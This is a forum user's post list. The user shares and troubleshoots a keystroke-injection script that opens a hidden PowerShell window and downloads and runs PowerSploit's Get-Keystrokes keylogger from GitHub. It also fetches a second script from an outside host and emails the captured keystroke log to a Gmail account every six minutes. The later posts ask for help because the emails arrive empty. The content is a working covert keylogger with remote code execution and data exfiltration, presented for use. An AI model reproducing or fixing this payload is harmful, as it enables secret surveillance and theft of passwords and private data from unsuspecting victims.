Jump to content

mrskannk

Active Members
  • Posts

    8
  • Joined

  • Last visited

Everything posted by mrskannk

  1. So if a followed you right tu script should look like this DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt) ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'xxxx@gmail.com' $ReportEmail.To.Add('xxxx@gmail.com') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}
  2. Nop , i ad a look on %temp% et there is no log.txt created tryed both script , same issue . Getting empty mails https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1 https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1
  3. Hey thank for reply , y try to modify the mail.ps1 with while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360} i'm still getting the same issue .. empty emails. I can't solve this probleme ?
  4. I'm still getting empty emails with this . does any one see anything who could help :D
  5. i'm getting the same isue. I'm getting empty email with speed09's script
×
×
  • Create New...